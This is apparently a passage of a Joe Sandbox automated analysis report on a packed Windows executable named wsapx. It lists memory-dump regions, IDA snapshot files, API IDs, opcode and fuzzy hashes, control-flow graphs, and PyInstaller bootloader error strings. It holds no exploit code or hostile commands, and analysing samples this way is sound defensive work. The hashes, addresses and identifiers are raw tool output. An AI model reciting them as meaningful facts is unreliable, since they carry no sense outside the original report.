                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667709353.00007FFD93DD0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD93DD1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD9407F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD9408C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD94102000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD941CD000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD942CE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD942D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD943CB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD943D6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD9444F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667746115.00007FFD94484000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668723386.00007FFD94492000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd93dd0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3300690313-0
                                                                                                                                                                                                                                                • Opcode ID: bf3875d787bfcc14ef9ed9645fa2fd386f6a2c0859c7a2bae9dc7dced8cafdbb
                                                                                                                                                                                                                                                • Instruction ID: 1f81d822a675cb5044e290471aee54219c241c0ccabe5a9e9365707d0e663e09
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf3875d787bfcc14ef9ed9645fa2fd386f6a2c0859c7a2bae9dc7dced8cafdbb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F362482271819287F7258F78D49027D77A0F749B85F049632EA9EC37C9EABCEA45D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2667625699.00007FFD93D97000.00000080.00000001.01000000.0000000A.sdmp, Offset: 00007FFD938A0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666677120.00007FFD938A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD938A1000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD938B2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD938C2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD938C8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93912000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93927000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93937000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD9393E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD9394C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93C09000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93C0B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93C82000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93CDA000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93D4A000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93D7F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666718070.00007FFD93D91000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2667660778.00007FFD93D99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd938a0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3300690313-0
                                                                                                                                                                                                                                                • Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                                                                                                • Instruction ID: e1f985239833bb133dbdbba7197d736defe8346e04e0287169b65a8c924fc557
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6262272272959287E7698FB8D42037D77A4F758B85F046532EA9ED37C4EA3CEA44C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007B2245630
                                                                                                                                                                                                                                                • String ID: :memory:
                                                                                                                                                                                                                                                • API String ID: 1780217008-2920599690
                                                                                                                                                                                                                                                • Opcode ID: 91b0e484d977521e88cb554add3d4ba898cd67a262d1f5dc198e376bfc7720f5
                                                                                                                                                                                                                                                • Instruction ID: 3535b69469330495f43426b4abf69aeb148265463564471ebec4c89c7f982fa3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91b0e484d977521e88cb554add3d4ba898cd67a262d1f5dc198e376bfc7720f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92429E22B09B8AC6EA74CFA594A437D37A5FB46B98F048135CA4D43796DF3CE494C381
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction ID: ee5f7b41a779f1b103c57a755e9006fa80703bf78b4dcbba2fcb032095924202
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F04472A18641C7F760AF64B49976AA750ABC4B74F844335D96D026D4DF3CD14E8A10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                                                                • Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                                                                                                • Instruction ID: 18091f8134eaa008a6e21a898c5cafd8ef0d62ab441da5de5950513a62cfd6bd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53A1EC61B09F8BC5EE788BD5A5F42383795BF47B48F548539C90D0A7A2DF6CA492C280

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 267 7ff7c71b1950-7ff7c71b198b call 7ff7c71b45b0 270 7ff7c71b1991-7ff7c71b19d1 call 7ff7c71b7f80 267->270 271 7ff7c71b1c4e-7ff7c71b1c72 call 7ff7c71bc5c0 267->271 276 7ff7c71b19d7-7ff7c71b19e7 call 7ff7c71c0744 270->276 277 7ff7c71b1c3b-7ff7c71b1c3e call 7ff7c71c00bc 270->277 282 7ff7c71b19e9-7ff7c71b1a03 call 7ff7c71c4f78 call 7ff7c71b2910 276->282 283 7ff7c71b1a08-7ff7c71b1a24 call 7ff7c71c040c 276->283 281 7ff7c71b1c43-7ff7c71b1c4b 277->281 281->271 282->277 288 7ff7c71b1a45-7ff7c71b1a5a call 7ff7c71c4f98 283->288 289 7ff7c71b1a26-7ff7c71b1a40 call 7ff7c71c4f78 call 7ff7c71b2910 283->289 297 7ff7c71b1a7b-7ff7c71b1afc call 7ff7c71b1c80 * 2 call 7ff7c71c0744 288->297 298 7ff7c71b1a5c-7ff7c71b1a76 call 7ff7c71c4f78 call 7ff7c71b2910 288->298 289->277 309 7ff7c71b1b01-7ff7c71b1b14 call 7ff7c71c4fb4 297->309 298->277 312 7ff7c71b1b35-7ff7c71b1b4e call 7ff7c71c040c 309->312 313 7ff7c71b1b16-7ff7c71b1b30 call 7ff7c71c4f78 call 7ff7c71b2910 309->313 318 7ff7c71b1b6f-7ff7c71b1b8b call 7ff7c71c0180 312->318 319 7ff7c71b1b50-7ff7c71b1b6a call 7ff7c71c4f78 call 7ff7c71b2910 312->319 313->277 327 7ff7c71b1b8d-7ff7c71b1b99 call 7ff7c71b2710 318->327 328 7ff7c71b1b9e-7ff7c71b1bac 318->328 319->277 327->277 328->277 331 7ff7c71b1bb2-7ff7c71b1bb9 328->331 333 7ff7c71b1bc1-7ff7c71b1bc7 331->333 334 7ff7c71b1be0-7ff7c71b1bef 333->334 335 7ff7c71b1bc9-7ff7c71b1bd6 333->335 334->334 336 7ff7c71b1bf1-7ff7c71b1bfa 334->336 335->336 337 7ff7c71b1c0f 336->337 338 7ff7c71b1bfc-7ff7c71b1bff 336->338 340 7ff7c71b1c11-7ff7c71b1c24 337->340 338->337 339 7ff7c71b1c01-7ff7c71b1c04 338->339 339->337 341 7ff7c71b1c06-7ff7c71b1c09 339->341 342 7ff7c71b1c26 340->342 343 7ff7c71b1c2d-7ff7c71b1c39 340->343 341->337 344 7ff7c71b1c0b-7ff7c71b1c0d 341->344 342->343 343->277 343->333 344->340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B7F80: _fread_nolock.LIBCMT ref: 00007FF7C71B802A
                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF7C71B1A1B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                • Opcode ID: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
                                                                                                                                                                                                                                                • Instruction ID: d70cfc6195fc226bdad842685ad331c19464c239623485a34b7d0e1af4d7eff2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E68184B1A0868687E721EF25F0812B9A3A0EFC4FA4F814435DD4E47785DE3CE6479B60

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 3899eae9b9cf556598d50536af751799a91292f9e5d7650659be9fe1a68b4b95
                                                                                                                                                                                                                                                • Instruction ID: b8c9533c1dff879ac79f854dec3860f975f53bc920527f97a2c7f245373c97bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3899eae9b9cf556598d50536af751799a91292f9e5d7650659be9fe1a68b4b95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85419E61A0864287EA10EF66B4811B9E3A0BF85FF4FC44436ED5E47B95DE3CE5079B20

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 528 7ff7c71b1210-7ff7c71b126d call 7ff7c71bbdf0 531 7ff7c71b126f-7ff7c71b1296 call 7ff7c71b2710 528->531 532 7ff7c71b1297-7ff7c71b12af call 7ff7c71c4fb4 528->532 537 7ff7c71b12b1-7ff7c71b12cf call 7ff7c71c4f78 call 7ff7c71b2910 532->537 538 7ff7c71b12d4-7ff7c71b12e4 call 7ff7c71c4fb4 532->538 550 7ff7c71b1439-7ff7c71b146d call 7ff7c71bbad0 call 7ff7c71c4fa0 * 2 537->550 544 7ff7c71b12e6-7ff7c71b1304 call 7ff7c71c4f78 call 7ff7c71b2910 538->544 545 7ff7c71b1309-7ff7c71b131b 538->545 544->550 546 7ff7c71b1320-7ff7c71b1345 call 7ff7c71c040c 545->546 556 7ff7c71b1431 546->556 557 7ff7c71b134b-7ff7c71b1355 call 7ff7c71c0180 546->557 556->550 557->556 564 7ff7c71b135b-7ff7c71b1367 557->564 566 7ff7c71b1370-7ff7c71b1398 call 7ff7c71ba230 564->566 569 7ff7c71b1416-7ff7c71b142c call 7ff7c71b2710 566->569 570 7ff7c71b139a-7ff7c71b139d 566->570 569->556 571 7ff7c71b1411 570->571 572 7ff7c71b139f-7ff7c71b13a9 570->572 571->569 574 7ff7c71b13d4-7ff7c71b13d7 572->574 575 7ff7c71b13ab-7ff7c71b13b9 call 7ff7c71c0b4c 572->575 576 7ff7c71b13d9-7ff7c71b13e7 call 7ff7c71d9ea0 574->576 577 7ff7c71b13ea-7ff7c71b13ef 574->577 581 7ff7c71b13be-7ff7c71b13c1 575->581 576->577 577->566 580 7ff7c71b13f5-7ff7c71b13f8 577->580 583 7ff7c71b13fa-7ff7c71b13fd 580->583 584 7ff7c71b140c-7ff7c71b140f 580->584 585 7ff7c71b13cf-7ff7c71b13d2 581->585 586 7ff7c71b13c3-7ff7c71b13cd call 7ff7c71c0180 581->586 583->569 588 7ff7c71b13ff-7ff7c71b1407 583->588 584->556 585->569 586->577 586->585 588->546
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                • Opcode ID: 5578c14fe94a244900e9a575e4f77a257a8de495ed559fdf9b362ebbbffb2fa7
                                                                                                                                                                                                                                                • Instruction ID: f0ddfb54fb9ec7ee14178d4a41ba3103b588aca2adbbb5e5cdd1bef71c2110f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5578c14fe94a244900e9a575e4f77a257a8de495ed559fdf9b362ebbbffb2fa7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951BB62A0864287EA60BF56B4403BAA691ABC5FB4FC44135ED4E47BD5EF3CE5078720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36E1
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2C50: MessageBoxW.USER32 ref: 00007FF7C71B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction ID: d7c625f00dc0556c782e8169b8c780d09ad15c6b6bcd1706939ef0799a3c3d24
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 292186A1B1854293FA21BF24F8453BAA250BFD9B74FC04131D95D825D5EE2CE507C720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
